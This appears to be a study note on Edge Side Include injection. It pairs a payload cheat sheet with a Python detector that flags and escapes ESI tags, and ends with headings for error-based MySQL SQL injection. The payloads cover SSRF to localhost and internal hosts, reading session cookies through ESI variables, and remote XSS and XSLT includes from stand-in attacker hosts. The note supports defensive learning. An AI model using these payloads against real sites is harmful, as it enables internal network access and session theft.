Study 7

ESI injection

1. Edge Side Include Injection

A markup language that can be used together with HTML tags to compose web pages.

https://www.w3.org/TR/esi-lang (ESI Language Specification 1.0)

http://esi-examples.akamai.com/

Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" />

Monday:<esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_id})" />

Tuesday:<esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_id})" />

Edge Side Includes Injection – SSRF

 

<esi:include src=http://127.0.0.1/server-status/>

<esi:include src=http://internal_domain/server_base_csrf_page/>

 


Edge Side Includes Injection – Session Hijacking

 

<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>

 

 

Edge Side Includes Injection – XSS

 

<esi:include src=http://hackersite/xss.html/>

 

 

Edge Side Includes Injection – XML

 

<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilhost/poc.xsl"/>
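A defensive check for the payload shapes listed above, as an added example that is not part of the original post: it flags ESI markup in user-controlled text and escapes it before the backend reflects it into a page that an ESI-capable surrogate will parse. The function names `classify` and `neutralize` and the label strings are hypothetical, and the sample inputs are constructed from the payloads in these notes.

```python
import html
import re

# Any opening, closing or self-closing ESI element, e.g. <esi:include ...> or </esi:vars>
ESI_TAG = re.compile(r"<\s*/?\s*esi:(\w+)([^>]*)>", re.IGNORECASE)
# ESI variable reference that reads a request cookie, e.g. $(HTTP_COOKIE{PHPSESSID})
COOKIE_VAR = re.compile(r"\$\(HTTP_COOKIE\b", re.IGNORECASE)
# src= / stylesheet= attribute values, quoted or unquoted
URL_ATTR = re.compile(r"""\b(src|stylesheet)\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)

# Constructed sample inputs: one benign value plus payload shapes from the notes above
SAMPLES = [
    "Seoul",
    "<esi:include src=http://127.0.0.1/server-status/>",
    "<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars>",
    '<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilhost/poc.xsl"/>',
]


def classify(text):
    """Return a sorted list of risk labels for ESI markup found in user input."""
    labels = set()
    for m in ESI_TAG.finditer(text):
        name, attrs = m.group(1).lower(), m.group(2)
        labels.add("esi-tag")
        if name == "include":
            for _, url in URL_ATTR.findall(attrs):
                if re.match(r"(?i)(https?:)?//", url):
                    labels.add("absolute-include")  # SSRF / remote content (XSS)
            if re.search(r"""(?i)\bdca\s*=\s*["']?xslt""", attrs):
                labels.add("xslt")                  # remote stylesheet processing
    if COOKIE_VAR.search(text):
        labels.add("cookie-variable")               # session cookie disclosure
    return sorted(labels)


def neutralize(text):
    """HTML-escape ESI tags so the surrogate no longer sees ESI syntax."""
    escaped = ESI_TAG.sub(lambda m: html.escape(m.group(0)), text)
    # Also break "$(" so a value reflected inside an existing ESI block is not expanded
    return escaped.replace("$(", "&#36;(")


if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), "->", neutralize(s))
```
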

 

 

Error Based SQL Injection

MySQL version 5.5.5

 

Mathematical operations

1. MySQL Error Based SQL Injection Using EXP

 

Hands-on practice

2. BIGINT Overflow Error Based SQL Injection in MySQL

Hands-on practice

 

 
